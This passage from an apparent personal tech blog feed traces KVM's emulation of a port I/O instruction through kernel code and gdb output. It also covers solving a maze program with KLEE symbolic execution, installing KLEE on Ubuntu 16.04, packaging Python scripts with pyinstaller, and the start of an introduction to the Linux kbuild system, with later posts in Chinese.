if (!(emulation_type & EMULTYPE_NO_DECODE)) {
init_emulate_ctxt(vcpu);
r = x86_decode_insn(ctxt, insn, insn_len);
}
restart:
r = x86_emulate_insn(ctxt);
if (ctxt->have_exception) {
inject_emulated_exception(vcpu);
r = EMULATE_DONE;
} else if (vcpu->arch.pio.count) {
if (!vcpu->arch.pio.in)
vcpu->arch.pio.count = 0;
else {
writeback = false;
vcpu->arch.complete_userspace_io = complete_emulated_pio;
}
r = EMULATE_DO_MMIO;
if (writeback) {
toggle_interruptibility(vcpu, ctxt->interruptibility);
kvm_set_rflags(vcpu, ctxt->eflags);
kvm_make_request(KVM_REQ_EVENT, vcpu);
vcpu->arch.emulate_regs_need_sync_to_vcpu = false;
kvm_rip_write(vcpu, ctxt->eip);
} else
vcpu->arch.emulate_regs_need_sync_to_vcpu = true;
return r;
}
EXPORT_SYMBOL_GPL(x86_emulate_instruction);
</code></pre></div></div>
<p>The first, x86_decode_insn, decodes the current instruction, as the name suggests.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int x86_decode_insn(struct x86_emulate_ctxt *ctxt, void *insn, int insn_len)
{
/* Legacy prefixes. */
for (;;) {
switch (ctxt->b = insn_fetch(u8, ctxt)) {
}
/* Opcode byte(s). */
opcode = opcode_table[ctxt->b];
/* Two-byte opcode? */
if (ctxt->b == 0x0f) {
ctxt->twobyte = 1;
ctxt->b = insn_fetch(u8, ctxt);
opcode = twobyte_table[ctxt->b];
}
ctxt->d = opcode.flags;
ctxt->execute = opcode.u.execute;
ctxt->check_perm = opcode.check_perm;
ctxt->intercept = opcode.intercept;
rc = decode_operand(ctxt, &ctxt->src, (ctxt->d >> SrcShift) & OpMask);
if (rc != X86EMUL_CONTINUE)
goto done;
/*
* Decode and fetch the second source operand: register, memory
* or immediate.
*/
rc = decode_operand(ctxt, &ctxt->src2, (ctxt->d >> Src2Shift) & OpMask);
if (rc != X86EMUL_CONTINUE)
goto done;
/* Decode and fetch the destination operand: register or memory. */
rc = decode_operand(ctxt, &ctxt->dst, (ctxt->d >> DstShift) & OpMask);
}
</code></pre></div></div>
<p>The instruction is first fetched via insn_fetch; the debug session below shows the byte fetched is exactly the machine code of our in instruction:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb)
4366 switch (ctxt->b = insn_fetch(u8, ctxt)) {
(gdb)
4414 if (ctxt->rex_prefix & 8)
(gdb) p ctxt->b
$38 = 229 '\345'
(gdb) p /x ctxt->b
$39 = 0xe5
</code></pre></div></div>
<p>Then the opcode is looked up in opcode_table to find the corresponding callback, which is assigned to ctxt->execute. For our in instruction the callback is em_in.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>4472 ctxt->execute = opcode.u.execute;
(gdb)
4473 ctxt->check_perm = opcode.check_perm;
(gdb) p ctxt->execute
$41 = (int (*)(struct x86_emulate_ctxt *)) 0xffffffff81027238 <em_in>
(gdb) n
</code></pre></div></div>
<p>Next, decode_operand is called three times to extract the operands. The debug output shows the source operand value is ctxt->src->val = 16 (the port), and the register to write is RAX, i.e. ctxt->dst->addr.reg.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) n
4528 rc = decode_operand(ctxt, &ctxt->src2, (ctxt->d >> Src2Shift) & OpMask);
(gdb) n
4529 if (rc != X86EMUL_CONTINUE)
(gdb) p ctxt->src->val
$42 = 16
(gdb) n
4533 rc = decode_operand(ctxt, &ctxt->dst, (ctxt->d >> DstShift) & OpMask);
(gdb) s
...
(gdb) p op->addr.reg
$46 = (unsigned long *) 0xffff88011d4296c8
(gdb) p ctxt->_regs[0]
$47 = 10
(gdb) p &ctxt->_regs[0]
$48 = (unsigned long *) 0xffff88011d4296c8
</code></pre></div></div>
<p>Back in x86_emulate_instruction, decoding is followed by execution, done by calling x86_emulate_insn.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int x86_emulate_insn(struct x86_emulate_ctxt *ctxt)
{
const struct x86_emulate_ops *ops = ctxt->ops;
int rc = X86EMUL_CONTINUE;
int saved_dst_type = ctxt->dst.type;
if (ctxt->execute) {
if (ctxt->d & Fastop) {
void (*fop)(struct fastop *) = (void *)ctxt->execute;
rc = fastop(ctxt, fop);
if (rc != X86EMUL_CONTINUE)
goto done;
goto writeback;
}
rc = ctxt->execute(ctxt);
if (rc != X86EMUL_CONTINUE)
goto done;
goto writeback;
}
writeback:
rc = writeback(ctxt);
if (rc != X86EMUL_CONTINUE)
goto done;
done:
if (rc == X86EMUL_PROPAGATE_FAULT)
ctxt->have_exception = true;
if (rc == X86EMUL_INTERCEPTED)
return EMULATION_INTERCEPTED;
if (rc == X86EMUL_CONTINUE)
writeback_registers(ctxt);
return (rc == X86EMUL_UNHANDLEABLE) ? EMULATION_FAILED : EMULATION_OK;
}
</code></pre></div></div>
<p>The most important step, naturally, is invoking the callback:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>rc = ctxt->execute(ctxt);
</code></pre></div></div>
<p>From the decoding above we know this is em_in; the functions involved are:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int em_in(struct x86_emulate_ctxt *ctxt)
{
if (!pio_in_emulated(ctxt, ctxt->dst.bytes, ctxt->src.val,
&ctxt->dst.val))
return X86EMUL_IO_NEEDED;
return X86EMUL_CONTINUE;
}
static int pio_in_emulated(struct x86_emulate_ctxt *ctxt,
unsigned int size, unsigned short port,
void *dest)
{
struct read_cache *rc = &ctxt->io_read;
if (rc->pos == rc->end) { /* refill pio read ahead */
...
rc->pos = rc->end = 0;
if (!ctxt->ops->pio_in_emulated(ctxt, size, port, rc->data, n))
return 0;
rc->end = n * size;
}
if (ctxt->rep_prefix && !(ctxt->eflags & EFLG_DF)) {
ctxt->dst.data = rc->data + rc->pos;
ctxt->dst.type = OP_MEM_STR;
ctxt->dst.count = (rc->end - rc->pos) / size;
rc->pos = rc->end;
} else {
memcpy(dest, rc->data + rc->pos, size);
rc->pos += size;
}
return 1;
}
static int emulator_pio_in_emulated(struct x86_emulate_ctxt *ctxt,
int size, unsigned short port, void *val,
unsigned int count)
{
struct kvm_vcpu *vcpu = emul_to_vcpu(ctxt);
int ret;
if (vcpu->arch.pio.count)
goto data_avail;
ret = emulator_pio_in_out(vcpu, size, port, val, count, true);
if (ret) {
data_avail:
memcpy(val, vcpu->arch.pio_data, size * count);
vcpu->arch.pio.count = 0;
return 1;
}
return 0;
}
</code></pre></div></div>
<p>In the last of these functions, since vcpu->arch.pio.count shows no data is available yet (user space must supply it), emulator_pio_in_out runs — the function we saw earlier: it fills in the kvm_run fields for user space to complete.</p>
<p>Once x86_emulate_insn finishes, the flow returns to x86_emulate_instruction; the crucial part is installing the vcpu->arch.complete_userspace_io callback:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (ctxt->have_exception) {
inject_emulated_exception(vcpu);
r = EMULATE_DONE;
} else if (vcpu->arch.pio.count) {
if (!vcpu->arch.pio.in)
vcpu->arch.pio.count = 0;
else {
writeback = false;
vcpu->arch.complete_userspace_io = complete_emulated_pio;
}
</code></pre></div></div>
<p>With that, this vm exit is done, and we drop back to user space at the KVM_RUN ioctl. User space finds a KVM_EXIT_IO whose direction is KVM_EXIT_IO_IN and writes 0xbeff into kvm_run.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>case KVM_EXIT_IO:
printf("KVM_EXIT_IO\n");
if(kvm->vcpus->kvm_run->io.direction == KVM_EXIT_IO_OUT)
printf("out port: %d, data: 0x%x\n",
kvm->vcpus->kvm_run->io.port,
*(int *)((char *)(kvm->vcpus->kvm_run) + kvm->vcpus->kvm_run->io.data_offset)
);
else if(kvm->vcpus->kvm_run->io.direction == KVM_EXIT_IO_IN)
{
printf("in port: %d\n",kvm->vcpus->kvm_run->io.port);
*(short*)((char*)(kvm->vcpus->kvm_run)+kvm->vcpus->kvm_run->io.data_offset) = 0xbeff;
}
</code></pre></div></div>
<p>Since the user-space ioctl normally runs in a loop (otherwise the guest could not keep running), KVM_RUN is issued again. Before entering non-root mode, one task is to check whether vcpu->arch.complete_userspace_io is set, and call it if so.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kvm_arch_vcpu_ioctl_run(struct kvm_vcpu *vcpu, struct kvm_run *kvm_run)
{
int r;
sigset_t sigsaved;
if (unlikely(vcpu->arch.complete_userspace_io)) {
int (*cui)(struct kvm_vcpu *) = vcpu->arch.complete_userspace_io;
vcpu->arch.complete_userspace_io = NULL;
r = cui(vcpu);
if (r <= 0)
goto out;
} else
WARN_ON(vcpu->arch.pio.count || vcpu->mmio_needed);
r = __vcpu_run(vcpu);
return r;
}
</code></pre></div></div>
<p>From the branch taken earlier we know that</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>vcpu->arch.complete_userspace_io = complete_emulated_pio;
</code></pre></div></div>
<p>Look at the corresponding code:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int complete_emulated_pio(struct kvm_vcpu *vcpu)
{
BUG_ON(!vcpu->arch.pio.count);
return complete_emulated_io(vcpu);
}
static inline int complete_emulated_io(struct kvm_vcpu *vcpu)
{
int r;
vcpu->srcu_idx = srcu_read_lock(&vcpu->kvm->srcu);
r = emulate_instruction(vcpu, EMULTYPE_NO_DECODE);
srcu_read_unlock(&vcpu->kvm->srcu, vcpu->srcu_idx);
if (r != EMULATE_DONE)
return 0;
return 1;
}
static inline int emulate_instruction(struct kvm_vcpu *vcpu,
int emulation_type)
{
return x86_emulate_instruction(vcpu, 0, emulation_type, NULL, 0);
}
</code></pre></div></div>
<p>Ultimately x86_emulate_instruction is called again — note the EMULTYPE_NO_DECODE argument, which skips decoding and directly executes our em_in from before.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int emulator_pio_in_emulated(struct x86_emulate_ctxt *ctxt,
int size, unsigned short port, void *val,
unsigned int count)
{
struct kvm_vcpu *vcpu = emul_to_vcpu(ctxt);
int ret;
if (vcpu->arch.pio.count)
goto data_avail;
ret = emulator_pio_in_out(vcpu, size, port, val, count, true);
if (ret) {
data_avail:
memcpy(val, vcpu->arch.pio_data, size * count);
vcpu->arch.pio.count = 0;
return 1;
}
return 0;
}
</code></pre></div></div>
<p>In the final emulator_pio_in_emulated, vcpu->arch.pio.count is now non-zero, meaning the data is available, and it ends up copied into ctxt->dst.val.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) n
em_in (ctxt=0xffff88011d429550) at arch/x86/kvm/emulate.c:3440
3440 return X86EMUL_CONTINUE;
(gdb) n
3441 }
(gdb) p ctxt->dst.val
$58 = 48895
(gdb) p /x ctxt->dst.val
$59 = 0xbeff
(gdb) n
</code></pre></div></div>
<p>Back in x86_emulate_insn, once the instruction callback has run, execution jumps to the writeback label:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (ctxt->execute) {
if (ctxt->d & Fastop) {
void (*fop)(struct fastop *) = (void *)ctxt->execute;
rc = fastop(ctxt, fop);
if (rc != X86EMUL_CONTINUE)
goto done;
goto writeback;
}
writeback:
rc = writeback(ctxt);
if (rc != X86EMUL_CONTINUE)
goto done;
</code></pre></div></div>
<p>Decoding determined earlier that ctxt->dst.type is a register, so write_register_operand executes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int writeback(struct x86_emulate_ctxt *ctxt)
{
int rc;
if (ctxt->d & NoWrite)
return X86EMUL_CONTINUE;
switch (ctxt->dst.type) {
case OP_REG:
write_register_operand(&ctxt->dst);
break;
return X86EMUL_CONTINUE;
}
static void write_register_operand(struct operand *op)
{
/* The 4-byte case *is* correct: in 64-bit mode we zero-extend. */
switch (op->bytes) {
case 1:
*(u8 *)op->addr.reg = (u8)op->val;
break;
case 2:
*(u16 *)op->addr.reg = (u16)op->val;
break;
case 4:
*op->addr.reg = (u32)op->val;
break; /* 64b: zero-extend */
case 8:
*op->addr.reg = op->val;
break;
}
}
</code></pre></div></div>
<p>In this last function, op->addr.reg is the destination register from decoding — rax, i.e. &amp;ctxt->_regs[0] — so the data (0xbeff) is written into the register. But this is the emulator context's copy; it still has to be written back into the vcpu's register state, which the following accomplishes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (rc == X86EMUL_CONTINUE)
writeback_registers(ctxt);
static void writeback_registers(struct x86_emulate_ctxt *ctxt)
{
unsigned reg;
for_each_set_bit(reg, (ulong *)&ctxt->regs_dirty, 16)
ctxt->ops->write_gpr(ctxt, reg, ctxt->_regs[reg]);
}
static void emulator_write_gpr(struct x86_emulate_ctxt *ctxt, unsigned reg, ulong val)
{
kvm_register_write(emul_to_vcpu(ctxt), reg, val);
}
static inline void kvm_register_write(struct kvm_vcpu *vcpu,
enum kvm_reg reg,
unsigned long val)
{
vcpu->arch.regs[reg] = val;
__set_bit(reg, (unsigned long *)&vcpu->arch.regs_dirty);
__set_bit(reg, (unsigned long *)&vcpu->arch.regs_avail);
}
</code></pre></div></div>
<p>Thus, when the guest is entered next, its RAX carries the data supplied from user space. Some debug output follows.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) n
x86_emulate_insn (ctxt=0xffff88011d429550) at arch/x86/kvm/emulate.c:4828
4828 ctxt->dst.type = saved_dst_type;
(gdb) p ctxt->dst.val
$64 = 48895
(gdb) p &ctxt->dst.val
$65 = (unsigned long *) 0xffff88011d429640
(gdb) p &op->val
No symbol "op" in current context.
(gdb) n
4830 if ((ctxt->d & SrcMask) == SrcSI)
(gdb) p ctxt->dst.type
$66 = OP_REG
(gdb) n
[New Thread 2976]
4833 if ((ctxt->d & DstMask) == DstDI)
(gdb) n
[New Thread 2978]
[New Thread 2977]
4836 if (ctxt->rep_prefix && (ctxt->d & String)) {
(gdb) n
4866 ctxt->eip = ctxt->_eip;
(gdb) n
4875 writeback_registers(ctxt);
</code></pre></div></div>
<h2 id="4">4. References</h2>
<p>oenhan: <a href="http://oenhan.com/kvm-src-5-io-pio">KVM源代码分析5:IO虚拟化之PIO</a></p>
<p>Alex Xu: <a href="http://soulxu.github.io/blog/2014/08/11/use-kvm-api-write-emulator/">使用KVM API实现Emulator
Demo</a></p>
KLEE解决迷宫问题2017-06-09T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/06/09/klee-maze
<p>This is the third KLEE tutorial; it is simple but fun enough to be worth writing down. The original is <a href="https://feliam.wordpress.com/2010/10/07/the-symbolic-maze/">here</a>.</p>
<h2>Problem description</h2>
<p>The problem is simple: find a path through the maze below from 'X' to '#', where a means left, d right, w up, and s down.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"+-+---+---+"
"|X|     |#|"
"| | --+ | |"
"| |   | | |"
"| +-- | | |"
"|     |   |"
"+-----+---+"
</code></pre></div></div>
<h2>The conventional approach</h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// http://feliam.wordpress.com/2010/10/07/the-symbolic-maze/
// twitter.com/feliam
/*
* It's a maze!
* Use a,s,d,w to move "through" it.
*/
#include<string.h>
#include<stdio.h>
#include<stdlib.h>
/**
* Maze hardcoded dimensions
*/
#define H 7
#define W 11
/**
* Tha maze map
*/
char maze[H][W] = { "+-+---+---+",
"| |     |#|",
"| | --+ | |",
"| |   | | |",
"| +-- | | |",
"|     |   |",
"+-----+---+" };
/**
* Draw the maze state in the screen!
*/
void draw ()
{
int i, j;
for (i = 0; i < H; i++)
{
for (j = 0; j < W; j++)
printf ("%c", maze[i][j]);
printf ("\n");
}
printf ("\n");
}
/**
* The main function
*/
int
main (int argc, char *argv[])
{
int x, y; //Player position
int ox, oy; //Old player position
int i = 0; //Iteration number
#define ITERS 28
char program[ITERS];
//Initial position
x = 1;
y = 1;
maze[y][x]='X';
//Print some info
printf ("Maze dimensions: %dx%d\n", W, H);
printf ("Player pos: %dx%d\n", x, y);
printf ("Iteration no. %d\n",i);
printf ("Program the player moves with a sequence of 'w', 's', 'a' and 'd'\n");
printf ("Try to reach the price(#)!\n");
//Draw the maze
draw ();
//Read the directions 'program' to execute...
read(0,program,ITERS);
//Iterate and run 'program'
while(i < ITERS)
{
//Save old player position
ox = x;
oy = y;
//Move polayer position depending on the actual command
switch (program[i])
{
case 'w':
y--;
break;
case 's':
y++;
break;
case 'a':
x--;
break;
case 'd':
x++;
break;
default:
printf("Wrong command!(only w,s,a,d accepted!)\n");
printf("You loose!\n");
exit(-1);
}
//If hit the price, You Win!!
if (maze[y][x] == '#')
{
printf ("You win!\n");
printf ("Your solution <%42s>\n",program);
exit (1);
}
//If something is wrong do not advance
if (maze[y][x] != ' '
&&
!((y == 2 && maze[y][x] == '|' && x > 0 && x < W)))
{
x = ox;
y = oy;
}
//Print new maze state and info...
printf ("Player pos: %dx%d\n", x, y);
printf ("Iteration no. %d. Action: %c. %s\n",i,program[i], ((ox==x && oy==y)?"Blocked!":""));
//If crashed to a wall! Exit, you loose
if (ox==x && oy==y){
printf("You loose\n");
exit(-2);
}
//put the player on the maze...
maze[y][x]='X';
//draw it
draw ();
//increment iteration
i++;
//me wait to human
sleep(1);
}
//You couldn't make it! You loose!
printf("You loose\n");
}
</code></pre></div></div>
<p>The program is straightforward: it takes an input string, steps through the moves, and finally prints win or loose. By inspection one solution is ssssddddwwaawwddddssssddwwww; a backtracking search could also find solutions programmatically. Here we focus on how KLEE finds one.</p>
<h2>Solving with KLEE</h2>
<p>KLEE's main job is to make inputs symbolic, so first replace the read call with klee_make_symbolic, which makes the program variable symbolic; the header #include &lt;klee/klee.h&gt; must of course be included.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>//read(0,program,ITERS);
klee_make_symbolic(program,ITERS,"program");
</code></pre></div></div>
<p>KLEE will then explore all paths, but that alone is not enough: we only care about winning paths, so we need a flag of some sort. Right after the statement</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>printf ("You win!\n");
</code></pre></div></div>
<p>we add a</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>klee_assert(0);
</code></pre></div></div>
<p>so that any successful path triggers an assert. Now run:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ clang -I ../klee/include -emit-llvm -c maze.c
$ klee maze.bc
...
KLEE: done: total instructions = 127519
KLEE: done: completed paths = 309
KLEE: done: generated tests = 306
test@ubuntu:~/kleestudy$ ls klee-last/*.err
klee-last/test000135.assert.err
test@ubuntu:~/kleestudy$ ktest-tool klee-last/test000135.ktest
ktest file : 'klee-last/test000135.ktest'
args : ['maze.bc']
num objects: 1
object 0: name: 'program'
object 0: size: 28
object 0: data: 'sddwddddsddwssssssssssssssss'
</code></pre></div></div>
<p>We see one solution printed,</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sddwddddsddwssssssssssssssss
</code></pre></div></div>
<p>Feeding this solution into the program from the second section shows it is correct. Notice that the solution KLEE printed differs from the one we found by eye. That is expected: in most cases KLEE emits only one path per error state. To emit all inputs reaching such a path, use -emit-all-errors:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ klee -emit-all-errors maze.bc
test@ubuntu:~/kleestudy$ ls klee-last/*.err
klee-last/test000139.assert.err klee-last/test000238.assert.err
klee-last/test000220.assert.err klee-last/test000301.assert.err
</code></pre></div></div>
<p>We see four solutions printed. In fact, watching the run makes clear that the player walks through a wall when y==2, which is also visible in the code.</p>
Ubuntu 16.04安装KLEE2017-06-08T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/06/08/klee-newbie
<p>Symbolic execution is rather refined stuff — you can hardly claim to work in security without having looked into it. It is also said to be a deep rabbit hole. This post records installing KLEE on Ubuntu 16.04, using clang/llvm 3.9. It largely follows the official instructions, with notes on the error-prone spots.</p>
<h3>1. Install dependencies</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt-get install build-essential curl libcap-dev git cmake libncurses5-dev python-minimal python-pip unzip
</code></pre></div></div>
<h3>2. Install LLVM 3.9</h3>
<p>This step just installs packages: from the <a href="http://apt.llvm.org/">LLVM Package Repository</a> pick llvm 3.9 and add it to /etc/apt/sources.list:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>deb http://apt.llvm.org/xenial/ llvm-toolchain-xenial-3.9 main
deb-src http://apt.llvm.org/xenial/ llvm-toolchain-xenial-3.9 main
</code></pre></div></div>
<p>Add the repository key and install the llvm 3.9 packages:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ wget -O - http://llvm.org/apt/llvm-snapshot.gpg.key|sudo apt-key add -
$ sudo apt-get update
$ sudo apt-get install clang-3.9 llvm-3.9 llvm-3.9-dev llvm-3.9-tools
</code></pre></div></div>
<p>Note that at this point /usr/bin/clang-3.9 is on the PATH; to use clang and the other tools without the 3.9 suffix, adjust PATH in ~/.profile:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>export PATH="/usr/lib/llvm-3.9/bin:$PATH"
</code></pre></div></div>
<h3>3. Install a constraint solver</h3>
<p>KLEE supports several constraint solvers; I use <a href="https://github.com/z3prover/z3">Z3</a>, which builds fine following its own instructions.</p>
<h3>4. Build uclibc and the POSIX environment model</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ git clone https://github.com/klee/klee-uclibc.git
$ cd klee-uclibc
$ ./configure --make-llvm-lib
$ make -j2
</code></pre></div></div>
<h3>5. Get Google test sources</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ curl -OL https://github.com/google/googletest/archive/release-1.7.0.zip
$ unzip release-1.7.0.zip
</code></pre></div></div>
<h3>6. Install lit</h3>
<p>Install with sudo:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo pip install lit
</code></pre></div></div>
<h3>7. Install tcmalloc</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt-get install libtcmalloc-minimal4 libgoogle-perftools-dev
</code></pre></div></div>
<h3>8. Get the KLEE source</h3>
<p>Since we use llvm 3.9, the official KLEE fails with the following problems:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/home/test/klee/include/klee/Internal/Support/FloatEvaluation.h: In function ‘bool klee::floats::isNaN(uint64_t, unsigned int)’:
/home/test/klee/include/klee/Internal/Support/FloatEvaluation.h:135:25: error: ‘IsNAN’ is not a member of ‘llvm’
case FLT_BITS: return llvm::IsNAN( UInt64AsFloat(l) );
^
/home/test/klee/include/klee/Internal/Support/FloatEvaluation.h:136:25: error: ‘IsNAN’ is not a member of ‘llvm’
case DBL_BITS: return llvm::IsNAN( UInt64AsDouble(l) );
^
/home/test/klee/lib/Core/Executor.cpp: In member function ‘void klee::Executor::executeCall(klee::ExecutionState&, klee::KInstruction*, llvm::Function*, std::vector<klee::ref<klee::Expr> >&)’:
/home/test/klee/lib/Core/Executor.cpp:1403:21: error: ‘RoundUpToAlignment’ is not a member of ‘llvm’
size = llvm::RoundUpToAlignment(size, 16);
</code></pre></div></div>
<p>Fortunately someone has provided an llvm 3.9 <a href="https://github.com/klee/klee/pull/605/commits/5c4d9bc67e43e4a97391105dfc6a286215897fdb">pr</a>, so we clone that author's repo directly.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>test@ubuntu:~$ git clone https://github.com/jirislaby/klee.git
test@ubuntu:~$ cd klee
test@ubuntu:~/klee$ git branch -a
* master
remotes/origin/HEAD -> origin/master
remotes/origin/better-paths
remotes/origin/errno
remotes/origin/llvm40_WallTimer
remotes/origin/llvm40_opt_end
remotes/origin/llvm40_static_casts
remotes/origin/llvm_37
remotes/origin/llvm_39
remotes/origin/master
test@ubuntu:~/klee$ git checkout remotes/origin/llvm_39
</code></pre></div></div>
<h3>9. Configure KLEE</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ mkdir klee_build_dir
$ cd klee_build_dir
$ cmake -DENABLE_SOLVER_Z3=ON \
-DENABLE_POSIX_RUNTIME=ON \
-DENABLE_KLEE_UCLIBC=ON \
-DKLEE_UCLIBC_PATH=../klee-uclibc \
-DGTEST_SRC_DIR=../googletest-release-1.7.0 \
-DENABLE_SYSTEM_TESTS=ON \
-DENABLE_UNIT_TESTS=ON \
../klee
</code></pre></div></div>
<p>如果这一步出现找不到Doxygen,需要安装</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt-get install doxygen
</code></pre></div></div>
<p>如果出现找不到ZLIB_LIBRARY (ADVANCED)的错误,需要自己下载安装zlib。</p>
<h3>10. 编译安装KLEE</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ make
$ sudo make install
</code></pre></div></div>
<p>这一步出现了一个错误:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>make[2]: *** No rule to make target '/usr/lib/llvm-3.9/lib/liblibLLVM-3.9.so.so', needed by 'bin/gen-random-bout'. Stop.
</code></pre></div></div>
<p>找不到这个so,一看名字liblibLLVM-3.9.so.so,太怪异了,目测是脚本的问题。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>test@ubuntu:~/klee_build_dir$ cd /usr/lib/llvm-3.9/lib
test@ubuntu:/usr/lib/llvm-3.9/lib$ ls
libLLVM-3.9.1.so libLLVMX86AsmParser.a
libLLVM-3.9.1.so.1 libLLVMX86AsmPrinter.a
libLLVM-3.9.so libLLVMX86CodeGen.a
libLLVM-3.9.so.1 libLLVMX86Desc.a
</code></pre></div></div>
<p>简单的解决办法:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ln -s libLLVM-3.9.so liblibLLVM-3.9.so.so
</code></pre></div></div>
<p>这样就把KLEE的环境搞好了,可以按照Tutorial搞起来了。</p>
Python打包成exe2017-05-18T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/05/18/python-to-exe
<p>这篇文章非常简单,主要做一下记录,以后方便查询。</p>
<p>Python简单易用经常被用来开发脚本。但是为了在其他地方运行,可能不仅需要安装Python解释器,
还得安装一些依赖库。这篇文章介绍一下使用pyinstaller打包exe的过程。
使用如下例子:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#test.py
import sys

def main():
    print "Hello world"
    print sys.argv[0]

if '__main__' == __name__:
    main()
</code></pre></div></div>
<p>首先安装pyinstaller:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pip install pyinstaller
</code></pre></div></div>
<p>按照<a href="http://www.pyinstaller.org/">官网</a>的说法,这个时候在Python的目录下使用</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pyinstaller test.py
</code></pre></div></div>
<p>就能够生成exe。虽然确实在dist/test目录下面生成了exe,但是如果放到其他地方运行,会有错误:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Error loading Python DLL: E:\study\python27.dll (error code 126)
</code></pre></div></div>
<p>可以使用如下命令解决:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>D:\Python27>pyinstaller --clean --win-private-assemblies -F test.py
</code></pre></div></div>
<p>这样在dist下会生成exe,并且把需要的Python解释器和相关的包全部打包,即可随意放到其他环境运行。</p>
Linux内核编译系统kbuild简介2017-03-29T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/03/29/kbuild-introduction
<ul>
<li><a href="#第一节">前言</a></li>
<li><a href="#第二节">kbuild四个部分</a></li>
<li><a href="#第三节">实例</a></li>
</ul>
<h2 id="第一节"> 前言 </h2>
<p>这篇文章并非原创,是偶然在linuxjournal上面看到的一篇<a href="http://www.linuxjournal.com/content/kbuild-linux-kernel-build-system?page=0,0">文章</a>,感觉写得比较清晰,例子详尽,所以这里对文章进行简单整理,算是一个笔记。本文主要是关于kbuild的简单介绍,不会介绍linux内核的具体编译过程,以后有机会单独写一篇。</p>
<p>Linux内核有一个神奇的地方,既可以用在大型集群上面,也可以用在小巧的嵌入式设备上。使用Linux的设备不论大小,都有一个共同的代码基,你看苹果就不行,OSX和iOS就是分开的。主要原因有两点,Linux有一个非常好的抽象层,以及构建系统允许有非常大的定制自由度。</p>
<p>Linux是一个宏内核(monolithic kernel),所有的内核代码都位于内核空间。但是Linux也能够加载内核模块,在内核运行期间动态增加内核代码。所以在内核编译的时候就需要决定哪些东西编译进内核,哪些编译成模块,这就需要一个系统来管理,它就是kbuild。</p>
<h2 id="第二节"> kbuild的四个部分 </h2>
<p>kbuild主要包括如下四个部分:</p>
<ul>
<li><b>Config symbols</b>:编译选项,用来决定代码的条件编译以及决定哪些编译进内核,哪些编译成模块。</li>
<li><b>Kconfig files</b>:定义每一个config symbol的属性,比如其类型、描述和依赖等。make menuconfig等工具显示的配置菜单就是读取这些文件生成的。</li>
<li><b>.config file</b>:存储每一个config symbol选择的值。可以手动修改或者使用make工具生成。</li>
<li><b>Makefiles</b>:这个就是普通的make工具了,用于指导源文件生成目标文件的过程,内核啊,内核模块啊。</li>
</ul>
